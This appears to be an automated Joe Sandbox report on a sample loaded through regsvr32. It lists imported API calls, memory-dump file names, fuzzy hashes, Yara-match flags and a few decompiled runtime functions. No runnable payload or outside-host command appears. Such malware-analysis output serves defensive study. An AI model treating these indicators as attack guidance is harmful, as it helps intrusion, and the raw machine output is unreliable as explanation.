ShowWindow.USER32 ref: 00000001800147DC
GetLastError.KERNEL32 ref: 00000001800147E6
ShowWindow.USER32 ref: 00000001800147F0
GetLastError.KERNEL32 ref: 00000001800147FA
ShowWindow.USER32 ref: 0000000180014804
GetLastError.KERNEL32 ref: 000000018001480E
ShowWindow.USER32 ref: 0000000180014818
GetLastError.KERNEL32 ref: 0000000180014822
ShowWindow.USER32 ref: 000000018001482C
GetLastError.KERNEL32 ref: 0000000180014836
ShowWindow.USER32 ref: 0000000180014840
GetLastError.KERNEL32 ref: 000000018001484A
ShowWindow.USER32 ref: 0000000180014854
GetLastError.KERNEL32 ref: 000000018001485E
ShowWindow.USER32 ref: 0000000180014868
GetLastError.KERNEL32 ref: 0000000180014872
ShowWindow.USER32 ref: 000000018001487C
GetLastError.KERNEL32 ref: 0000000180014886
ShowWindow.USER32 ref: 0000000180014890
GetLastError.KERNEL32 ref: 000000018001489A
ShowWindow.USER32 ref: 00000001800148A4
GetLastError.KERNEL32 ref: 00000001800148AE
ShowWindow.USER32 ref: 00000001800148B8
GetLastError.KERNEL32 ref: 00000001800148C2
ShowWindow.USER32 ref: 00000001800148CC
GetLastError.KERNEL32 ref: 00000001800148D6
ShowWindow.USER32 ref: 00000001800148E0
GetLastError.KERNEL32 ref: 00000001800148EA
ShowWindow.USER32 ref: 00000001800148F4
GetLastError.KERNEL32 ref: 00000001800148FE
ShowWindow.USER32 ref: 0000000180014908
GetLastError.KERNEL32 ref: 0000000180014912
ShowWindow.USER32 ref: 000000018001491C
GetLastError.KERNEL32 ref: 0000000180014926
ShowWindow.USER32 ref: 0000000180014930
GetLastError.KERNEL32 ref: 000000018001493A
ShowWindow.USER32 ref: 0000000180014944
GetLastError.KERNEL32 ref: 000000018001494E
ShowWindow.USER32 ref: 0000000180014958
GetLastError.KERNEL32 ref: 0000000180014962
ShowWindow.USER32 ref: 000000018001496C
GetLastError.KERNEL32 ref: 0000000180014976
ShowWindow.USER32 ref: 0000000180014980
GetLastError.KERNEL32 ref: 000000018001498A
ShowWindow.USER32 ref: 0000000180014994
GetLastError.KERNEL32 ref: 000000018001499E
ShowWindow.USER32 ref: 00000001800149A8
GetLastError.KERNEL32 ref: 00000001800149B2
ShowWindow.USER32 ref: 00000001800149BC
GetLastError.KERNEL32 ref: 00000001800149C6
ShowWindow.USER32 ref: 00000001800149D0
GetLastError.KERNEL32 ref: 00000001800149DA
ShowWindow.USER32 ref: 00000001800149E4
GetLastError.KERNEL32 ref: 00000001800149EE
ShowWindow.USER32 ref: 00000001800149F8
GetLastError.KERNEL32 ref: 0000000180014A02
ShowWindow.USER32 ref: 0000000180014A0C
GetLastError.KERNEL32 ref: 0000000180014A16
ShowWindow.USER32 ref: 0000000180014A20
GetLastError.KERNEL32 ref: 0000000180014A2A
ShowWindow.USER32 ref: 0000000180014A34
GetLastError.KERNEL32 ref: 0000000180014A3E
ShowWindow.USER32 ref: 0000000180014A48
GetLastError.KERNEL32 ref: 0000000180014A52
ShowWindow.USER32 ref: 0000000180014A5C
GetLastError.KERNEL32 ref: 0000000180014A66
ShowWindow.USER32 ref: 0000000180014A70
GetLastError.KERNEL32 ref: 0000000180014A7A
ShowWindow.USER32 ref: 0000000180014A84
GetLastError.KERNEL32 ref: 0000000180014A8E
ShowWindow.USER32 ref: 0000000180014A98
GetLastError.KERNEL32 ref: 0000000180014AA2
ShowWindow.USER32 ref: 0000000180014AAC
GetLastError.KERNEL32 ref: 0000000180014AB6
ShowWindow.USER32 ref: 0000000180014AC0
GetLastError.KERNEL32 ref: 0000000180014ACA
ShowWindow.USER32 ref: 0000000180014AD4
GetLastError.KERNEL32 ref: 0000000180014ADE
ShowWindow.USER32 ref: 0000000180014AE8
GetLastError.KERNEL32 ref: 0000000180014AF2

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorLastShowWindow
String ID:
API String ID: 3252650109-0
Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001C48 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000000180001C64
RtlCaptureContext.NTDLL ref: 0000000180001C91
RtlLookupFunctionEntry.NTDLL ref: 0000000180001CAB
RtlVirtualUnwind.NTDLL ref: 0000000180001CEC
IsDebuggerPresent.KERNEL32 ref: 0000000180001D40
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000180001D61
UnhandledExceptionFilter.KERNEL32 ref: 0000000180001D6C

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800082EC Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t38;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t95;

				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t60 =  *0x80021010; // 0xfdf94ef470f2
				 *(_t87 + 0x4e0) = _t60 ^ _t90;
				if (__ecx == 0xffffffff) goto 0x8000832b;
				E00000001180001C40(_t36);
				r8d = 0x98;
				E00000001180002680();
				r8d = 0x4d0;
				E00000001180002680();
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t63 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0x800083be;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
				if (_t38 != 0) goto 0x80008420;
				if (__ecx == 0xffffffff) goto 0x80008420;
				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
			}

0x1800082ec
0x1800082f1
0x1800082fa
0x180008302
0x180008309
0x180008313
0x180008324
0x180008326
0x180008332
0x180008338
0x180008343
0x180008349
0x180008353
0x18000835c
0x180008360
0x180008365
0x18000837a
0x18000837d
0x180008386
0x180008388
0x18000839b
0x1800083a8
0x1800083b1
0x1800083b8
0x1800083c5
0x1800083d7
0x1800083db
0x1800083e9
0x1800083ed
0x1800083f1
0x1800083fb
0x18000840e
0x180008412
0x180008417
0x180008446

APIs

RtlCaptureContext.NTDLL ref: 0000000180008365
RtlLookupFunctionEntry.NTDLL ref: 000000018000837D
RtlVirtualUnwind.NTDLL ref: 00000001800083B8
IsDebuggerPresent.KERNEL32 ref: 00000001800083F1
SetUnhandledExceptionFilter.KERNEL32 ref: 00000001800083FB
UnhandledExceptionFilter.KERNEL32 ref: 0000000180008406

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00

Uniqueness

Uniqueness Score: -1.00%

Function 005CF8C4 Relevance: 6.6, Strings: 5, Instructions: 393COMMON

Download Yara Rule

Strings

G]W2, xrefs: 005CFE0A
X2D7, xrefs: 005CF947
Wlw, xrefs: 005CFD4C
n, xrefs: 005CFAEB
Uf, xrefs: 005CFDA2

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: G]W2$Uf$Wlw$X2D7$n
API String ID: 0-182303197
Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
Instruction ID: de799f39ad8c12d76bfeeb4fd400c81813cd9e4ca686eda0648b081de0f536aa
Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
Instruction Fuzzy Hash: ED121670A04709EFDB58DF68C18AA9EBBF1FF48304F40856DE84AAB250D775DA18CB45

Uniqueness

Uniqueness Score: -1.00%

Function 005D5384 Relevance: 6.6, Strings: 5, Instructions: 313COMMON

Download Yara Rule

Strings

GK, xrefs: 005D5653
~~K, xrefs: 005D5842
Q|-, xrefs: 005D580C
Bt$, xrefs: 005D5461
M/uB, xrefs: 005D5729

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GK$M/uB$Q|-$~~K$Bt$
API String ID: 0-557373213
Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
Instruction ID: c24983b82a3b6200a1be117783a3df7fcec650f56183462ad2b52497ac559b0e
Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
Instruction Fuzzy Hash: 85E1F17550160CCBDB68DF38C0994D93BE1FF58308F61122AFC6AA62A2DB74D915CB49

Uniqueness

Uniqueness Score: -1.00%

Function 005C8378 Relevance: 6.5, Strings: 5, Instructions: 238COMMON

Download Yara Rule

Strings

.I, xrefs: 005C8439
{, xrefs: 005C8649
gBfh, xrefs: 005C83D0
w|, xrefs: 005C8634
i[, xrefs: 005C867B

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .I$gBfh$i[$w|${
API String ID: 0-448909954
Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
Instruction ID: 0f3cf0bdc1202af50f2e70606e5896298fd6933ef3c3ce253941cb59ab98fa4f
Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
Instruction Fuzzy Hash: E9B115709247499FCB88DFA9D8899DDBBF0FB48304F40921DE816AB250C778A985CF95

Uniqueness

Uniqueness Score: -1.00%

Function 005D610C Relevance: 6.5, Strings: 5, Instructions: 208COMMON

Download Yara Rule

Strings

vm, xrefs: 005D634F
cp, xrefs: 005D627B
zu, xrefs: 005D61F7
x, xrefs: 005D63D0
Kn#, xrefs: 005D61C9

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: cp$vm$x$zu$Kn#
API String ID: 0-3521309225
Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
Instruction ID: 499e746c9159f355ace046f6e86fd1ad6a708004bf2647f198cda2893ab244a8
Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
Instruction Fuzzy Hash: 42A102B0D143198FDB58CFA9D88A8DEBBF0FB48314F10861AE855B7290D3789945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 005D7518 Relevance: 6.3, Strings: 5, Instructions: 87COMMON

Download Yara Rule

Strings

#0FQ, xrefs: 005D75F5
tS, xrefs: 005D7639
lXjD, xrefs: 005D7598
C;, xrefs: 005D75B8
0T, xrefs: 005D75D1

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #0FQ$0T$C;$lXjD$tS
API String ID: 0-817034907
Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
Instruction ID: 886d6baae553201cb3a6d590c21f02c1d3f56f0f25cc80f59f5f8585770dc957
Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
Instruction Fuzzy Hash: AF4192B180034E8FDB44DFA4D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 005C975C Relevance: 6.3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

Strings

Rc, xrefs: 005C9782
D-, xrefs: 005C984C
3T, xrefs: 005C9861
l, xrefs: 005C97B1
,, xrefs: 005C97CB

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$3T$D-$Rc$l
API String ID: 0-617906138
Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
Instruction ID: defbf3b02b93a1a4907f758cb3c0aa708ff07ed2d8d3c39ba730282576dec213
Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
Instruction Fuzzy Hash: 5941D5B081078E8FDB44CF64D88A5CE7FF0FB58358F114619E869A6260D3B89664CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001D98 Relevance: 6.0, APIs: 4, Instructions: 39
timethreadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00000001180001D98(long long __rbx, long long _a32) {

				_a32 = __rbx;
			}

0x180001d98

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180001DC4
GetCurrentThreadId.KERNEL32 ref: 0000000180001DD2
GetCurrentProcessId.KERNEL32 ref: 0000000180001DDE
QueryPerformanceCounter.KERNEL32 ref: 0000000180001DEE

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340

Uniqueness

Uniqueness Score: -1.00%

Function 005DCF70 Relevance: 5.4, Strings: 4, Instructions: 410COMMON

Download Yara Rule

Strings

y4.), xrefs: 005DD445
#X, xrefs: 005DD3DB
, xrefs: 005DD0A7
UCV, xrefs: 005DD433

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$ $UCV$y4.)
API String ID: 0-917551206
Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
Instruction ID: f1fe01f356eef2269d05d10ca455d42e7584d4b70baa82558691f304edbc1f06
Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
Instruction Fuzzy Hash: F912E4B1A0470D9FDB58DFA8E08A4DDBBF2FB48344F00452EE946A7290D7B5D809CB95

Uniqueness

Uniqueness Score: -1.00%

Function 005C4EB8 Relevance: 5.4, Strings: 4, Instructions: 386COMMON

Download Yara Rule

Strings

#X, xrefs: 005C521E
tL>, xrefs: 005C5068
rq%, xrefs: 005C52CE
"., xrefs: 005C533A

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$rq%$tL>$".
API String ID: 0-3922733902
Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
Instruction ID: e78a4fce94bcee25d3b24008c679dc2cfb03e48bfa266f61513c3b1adc8ce6d7
Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
Instruction Fuzzy Hash: 6022C0719096C88BDBF8DF64C8896DD3BF0FF48344F90125AD84E9A654DBB86684CF42

Uniqueness

Uniqueness Score: -1.00%

Function 005DAD28 Relevance: 5.2, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

g, xrefs: 005DAE44
-, xrefs: 005DAE56
HE, xrefs: 005DAFE0
Vc, xrefs: 005DAE8C

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g$-$HE$Vc
API String ID: 0-2562162751
Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
Instruction ID: 58f3dddac717d5d1b705c6c51c8a499fc6917c759e11968b96d58e153d022cfb
Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
Instruction Fuzzy Hash: 16A1E3B150478D9FDB84CF28D88A4CD3BB2FB58368F50521AFC4A87260D7B8D985CB85

Uniqueness

Uniqueness Score: -1.00%

Function 005C80CC Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

(;, xrefs: 005C82E2
*%, xrefs: 005C8281
*i, xrefs: 005C80E7
he, xrefs: 005C814E

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (;$*i$he$*%
API String ID: 0-35414758
Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
Instruction ID: b2dcde9e59eae8f7dbad2d7ed21d2775d40456f4e7457e8b5a374d025297f5fb
Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
Instruction Fuzzy Hash: 2D7126705143499FDB48CF68C88A5ED3FA1FB48358F56631DFC4AA6290CB78D884CB89

Uniqueness

Uniqueness Score: -1.00%

Function 005CD474 Relevance: 5.1, Strings: 4, Instructions: 136COMMON

Download Yara Rule

Strings

(, xrefs: 005CD533
Yu, xrefs: 005CD5D1
I, xrefs: 005CD66B
*/, xrefs: 005CD623

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: */$I$Yu$(
API String ID: 0-674225443
Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
Instruction ID: 21d6cd535c967c53488393f81636a020fa459b00793c7110c9844791b8776488
Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
Instruction Fuzzy Hash: 63718DB190070ACFDB58CF68D48A5DE7FB0FB68398F204219F85596260D7B49AA5CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 005C14D4 Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

#X, xrefs: 005C1535
.:, xrefs: 005E57E4
W, xrefs: 005C1581
PYq|, xrefs: 005E5812

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$.:$PYq|$W
API String ID: 0-626586655
Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
Instruction ID: 5947839c783f72012dd00fddbb00169b37b6186c35c8d469a258b842db88a436
Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
Instruction Fuzzy Hash: DF41D27061CB858FD7A8DF28D58A65BBBF0FBD9704F804A1EF589C7250DB7598048B42

Uniqueness

Uniqueness Score: -1.00%

Function 005CA660 Relevance: 5.1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

Strings

P, xrefs: 005CA670
<ml, xrefs: 005CA697
a:, xrefs: 005CA76D
5`, xrefs: 005CA677

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5`$<ml$a:$P
API String ID: 0-330785107
Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
Instruction ID: 445d27e54d63c53bc2d0fd0e0e5032ce1792b6d70ad023b275cd180d8b6cc6db
Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
Instruction Fuzzy Hash: D241F4B190074E8BDB48DF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 005D4A90 Relevance: 5.1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

Strings

S, xrefs: 005D4B8E
0u, xrefs: 005D4AA7
-+, xrefs: 005D4B75
e!, xrefs: 005D4BE7

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -+$0u$S$e!
API String ID: 0-4217091389
Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
Instruction ID: 7070be099dfc2f75d801587ade0ee9c2be78bc374ab5d695e31068aae7cb2c2f
Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
Instruction Fuzzy Hash: 4641E3B090474A8FDB48DF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 005C3274 Relevance: 5.1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

Strings

"B, xrefs: 005C32CE
wU, xrefs: 005C335D
o, xrefs: 005C32EB
SJ, xrefs: 005C3292

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: o$"B$SJ$wU
API String ID: 0-691100934
Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
Instruction ID: f232e2e46b9fc6e187a3487c6d260cd390e191165cfef00d601cf89a3f83d9dc
Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
Instruction Fuzzy Hash: D141DFB180078E8FDB48CF68C88A5DEBBF0FB58358F104619E859A6254D3B89695CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 005C1B94 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

b, xrefs: 005C1C2E
9luJ, xrefs: 005C1BF8
=2y}, xrefs: 005C1CEE
=2y}, xrefs: 005C1CF9

Memory Dump Source

Source File: 0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c1000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 9luJ$=2y}$=2y}$b
API String ID: 0-1667874806
Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
Instruction ID: 2fde9d8eddd0552b90b8d3c3e0e566bab24a44448b426916b17393fa585615c3
Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
Instruction Fuzzy Hash: 0241D7B181038EDFDF44CF64D88A9CE7BB0FB18358F110A19F865A6264D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 005C48FC Relevance: 4.0, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

